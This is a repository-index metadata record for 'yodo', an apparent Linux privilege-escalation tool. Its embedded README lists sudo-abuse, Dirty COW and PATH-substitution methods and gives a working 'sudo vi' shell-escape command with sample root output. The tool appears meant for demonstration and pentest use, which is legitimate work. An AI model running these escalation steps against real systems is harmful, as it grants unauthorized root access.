{"id":13747735,"url":"https://github.com/b3rito/yodo","last_synced_at":"2025-05-09T09:30:47.447Z","repository":{"id":82360101,"uuid":"73642802","full_name":"b3rito/yodo","owner":"b3rito","description":"Local Privilege Escalation ","archived":false,"fork":false,"pushed_at":"2017-02-28T15:38:13.000Z","size":34,"stargazers_count":201,"open_issues_count":0,"forks_count":34,"subscribers_count":11,"default_branch":"master","last_synced_at":"2024-03-15T22:39:40.486Z","etag":null,"topics":["linux","local-privilege-escalation","privilege-escalation"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/b3rito.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2016-11-13T21:02:03.000Z","updated_at":"2023-11-17T22:21:31.000Z","dependencies_parsed_at":"2023-03-03T01:15:52.968Z","dependency_job_id":null,"html_url":"https://github.com/b3rito/yodo","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b3rito%2Fyodo","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b3rito%2Fyodo/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b3rito%2Fyodo/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/b3rito%2Fyodo/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/b3rito","download_url":"https://codeload.github.com/b3rito/yodo/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253226300,"owners_count":21874309,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["linux","local-privilege-escalation","privilege-escalation"],"created_at":"2024-08-03T06:01:40.387Z","updated_at":"2025-05-09T09:30:47.147Z","avatar_url":"https://github.com/b3rito.png","language":"Shell","funding_links":[],"categories":["Shell"],"sub_categories":[],"readme":"# yodo\nThis tool proves how easy it is to become root via limited sudo permissions, via dirty COW or using Pa(th)zuzu.\n\ndirty COW : exploits a race condition in the implementation of the copy-on-write mechanism\nLink : https://dirtycow.ninja\n\nPa(th)zuzu : Checks for PATH substitution vulnerabilities, logs the commands executed by the vulnerable executables and injects commands with the permissions of the owner of the process (SUID)\nLink : https://github.com/ShotokanZH/Pa-th-zuzu\n\n\n# Extra features\n-\nVSP : checks if the user is able to overwrite a sudo-enabled command with his own\n\nHistory : checks for * history (like bash_history) files. You could be lucky!\n\nb3 : tries to substitute commands that has root privileges [sudo -l \u003e\u003e\u003e User may run the following commands ... (root) NOPASSWD: /path/to/script]\n\n\n\n\nExample:\nIf a user has sudo privileges only on vi, he could become root by runnuing this command: sudo vi -c ':shell'\n\n b3rito@victim ~/Desktop $ sudo vi -c ':shell'\n [sudo] password for b3rito:\n victim Desktop # whoami\n root\n\n# Author\nWritten by b3rito at mes3hacklab\n\n# Installation\n chmod +x yodo.sh\n\n# Usage\n./yodo.sh\n \n b3rito@victim ~/Desktop $ ./yodo.sh\n ======================================================================= \n .... \n .. .77. \n Z. ,77? \n .Z$.....,?+?. \n .... $?Z.77+??I.. \n .7I. .....~.77:=I..Z..... \n .77? ..7?.?.=7....ZO..~.. \n .. ..7$7.=7I$.??+.$$~.==.??.. .~.. \n .$Z$..Z...77.$7..+=?,.I?=.++.+~....?7... .. \n ..?.I7:..77....$$IO++??=...7$.Z$..7$?..7$ \n .77.+:$?7..Z$.?,.~M,?,..77. .ZZ...,,.$77.. \n ..$=. +7$7...77+$I? ???M.$.I:~I?..,$..7$.Z7=. \n ..Z7Z.=..~,.....,=O...~MI=~=...O$.~...?7..:$7I. \n ...Z.Z.?I?.=:.??...??..M.ZZ.. ,.~Z$I,.,7...I.,.... \n ..,......:.~~.?.?+..?~7M..,?...==.~7..:.Z$+.. ....\n .?7..??,...Z.=?:.I7..M. D$Z?$+=.:... +Z+,....77.....\n .$~...:+O7$.+I+$=~:.=...7,:M.M~7 ..Z$..+~:?...7?$.?$~.OZZ$Z...\n ..$I7=?I?,..7?$$M..=:..?...MM.7$,.7...:??....,7I...?..Z$Z$$$.\n ...,=~.?.+.7.....8.$...?,+~MD+I...$7.I.O$Z$.. D8..I=$:$,....\n .$~+$....7Z.$$$7M.?+=$..,M8 .Z.I., M,ZZZ.MM..7+?+77..7..\n .. ...$.MM.....MZ$~Z:Z,MM.O$,$7,MZ .NMM.~77.+?+.7...\n I7~Z....MM .M7Z....?MMO,Z..$.M 8MM ..=77I=~?..I~.\n .$7I7?.+...$...:MMM. .$=OMM?Z,,..MMMMMMMMMMMMMI..=Z$+...\n ..?7I$$I.+.O:Z,=.8MN.$??MMM..$7.MMM...Z.$.+,?.Z.Z=..$77$..\n ...?OMMMMMMDMM7$IMMM ..MMM..,$7.Z$Z..??I$,Z.?I...\n 7?:++.??=...~8D..MMM MMMM.???.$...~$.....$Z..7$.. \n .....??,::Z$::MM.MMMMMM,,=II?II,..... ...... ..\n ,...?:...IOOO8OO8 ?I,: ,. \n . 88OOOO. :. \n .:,,,:,.8OOOO :. \n .,....,. OO8M:.. :. \n ..... . 8OMN.:. \n .ONM8::. \n :8MDO 8MDO :8MDO, DMO8M :8MDO, \n DMO DMO .+8D MO, DMO 8M .+8D MO,\n O O $O OMM DMO 8M $O OMM \n :8MDO .OO O8 DMO 8M .OO O8M,\n DMO .8°O88 DMO8M .8°O88\n .8OOOO. . :. \n ... OOOOO,. \n .. . ...... .........,.MMMMMMI.,........... . \n . .. ,INMMMMMMMMMMMMMMMMMMIZMMMMMMMN7=..... . . . ..\n . =. ......~?ZMMMIM.MM NMMN... .......=+ . . \n . .. . .$...MM,.MM ..MD....MMMMO... .. ..,..~ \n , . . :MM. MM .ZMM?.. .$M...7MD77ZD+.,. \n . . :=D7Z8MM. .M: .. .MD.. .7D~. ..,.O. .. \n .. $..=. ?M?. .. .M. ..M...IMM .,..M .. ..:.. \n . ..... . .MM.Z D ,M+. . :+..M. N+ . . ..? . .... \n .M7=.+.=.~.:MM. . , . .M.. . ,. \n .N?.8. ~ ..,M 8. ... . M. . M. . . . \n . ..NM .$.. .MM... . ,+.:: 8 . \n . =M.M ..?.. ..M M . . .M .I,.M. \n ,~~ . .I...8.. M M .8,. Z.... b3 \n . +. +. .. : .M....O. ... . D.=. \n O. .~, $. 8 . .~. ..+ . \n 8. ... M. ,.. , + .I.. .,..7 \n O. . I I .. . . .... \n +. . : .M. \n . . M \n .. . .. \n . . \n ~. N. \n =======================================================================\n Possible options (‡ excluded):\n [·] find\n [·] vi\n [·] b3\n \n Select From the menu:\n \n 1) Find 8) Man * 17) Pathzuzu °‡\n 2) AWK 10) Dirty COW °‡ 18) History °‡\n 3) Nmap 11) Gdb 19) Vim\n 4) Vi 12) Ruby 20) Lua\n 5) Python 13) b3 21) Ftp *\n 6) Irb 14) Perl 22) Credits\n 7) Less * 15) Tee 23) Update\n 8) More * 16) VSP °‡ 99) Exit\n \n VSP = Vulnerable Script Permissions\n Pathzuzu = SUID exploitation through Path vulnerability\n b3 = editable root privileged commands listed in 'sudo -l'\n * user interatcion\n ° sudo not required\n Enter Number: 1\n [sudo] password for b3rito:\n victim Desktop # whoami\n root\n victim Desktop #\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb3rito%2Fyodo","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fb3rito%2Fyodo","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb3rito%2Fyodo/lists"}